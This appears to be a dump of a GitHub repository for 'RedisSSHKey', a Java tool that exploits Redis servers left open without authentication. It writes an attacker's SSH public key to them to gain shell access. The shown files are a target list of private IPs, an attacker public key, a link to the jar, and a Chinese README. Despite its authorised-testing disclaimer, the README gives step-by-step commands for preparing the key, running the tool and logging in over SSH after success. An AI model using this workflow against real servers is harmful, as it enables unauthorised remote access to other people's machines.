├── url.txt
├── example01.png
├── example02.jpg
├── RedisSSHKey.jar
├── key.txt
└── README.md


/url.txt:
--------------------------------------------------------------------------------
1 | 192.168.111.222:6379
2 | 192.168.111.111:6379


--------------------------------------------------------------------------------
/example01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tas9er/RedisSSHKey/HEAD/example01.png


--------------------------------------------------------------------------------
/example02.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tas9er/RedisSSHKey/HEAD/example02.jpg


--------------------------------------------------------------------------------
/RedisSSHKey.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tas9er/RedisSSHKey/HEAD/RedisSSHKey.jar


--------------------------------------------------------------------------------
/key.txt:
--------------------------------------------------------------------------------
1 | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZQJWFL3VHgZW8KZian56XF/uxFW9LLbJjM21XXJwlXELSeMFwuomt6vQruiCe9UVv2krb3X+mKsv+CIWbeHqQXXuH2x/9T1lcFSJGm8I8V0yEKguxRz0kyRQFqn5LypDJF83fy2vdkR4+3KmAwKs7X3Cd8B3s0YPhVE+vuRYni+FC3OlMPWd7N7Ai6xZC96CzfeF/lwGrz8yydybTJowLI0Mfa851/bE+hDu28DaOaQ4Den2ZMjDjyEPNSQJK9xu34sEMxHfYT+tieGBkY75CR8Jzw6kiWfQOVc8v6eJ2v2hQngQYIgRWBrdSB7lk+OBsvR9m5bzcK5eZKCWtVyPN root@admins-PC


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | **Redis未授权SSH协议公钥写入漏洞验证**
 2 | 
 3 | **Code By:Tas9er**
 4 | 
 5 | 
 6 | 
 7 | 警 告
 8 | 本工具旨在帮助企业快速定位漏洞修复漏洞,仅限授权安全测试使用严格遵守《中华人民共和国网络安全法》,禁止未授权非法攻击站点
 9 | 
10 | 
11 | 
12 | 授权测试用例:
13 | 
14 | 将企业授权安全测试目标整理后放入url.txt
15 | 
16 | Example:
17 | Ⅰ:建议攻击机使用Linux操作系统
18 | Ⅱ:攻击机Linux执行:ssh-keygen -t rsa
19 | Ⅲ:攻击机Linux执行:(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > fuck.txt
20 | Ⅳ:将生成的fuck.txt里的数据拷贝到本工具目录下的key.txt
21 | Ⅴ:攻击成功后可以直接在攻击机Linux里执行ssh ip
22 | 
23 | java -jar RedisSSHKey.jar
24 | 
25 | ![example01](example01.png)
26 | 
27 | ![example02](example02.jpg)
28 | 
29 | 等待系统结束后,存在漏洞的网站以及结果会保存在当前目录下,同时也对企业服务器的安全设备的部署有一定的可用性检测。
30 | 
31 | 
32 | 
33 | 


--------------------------------------------------------------------------------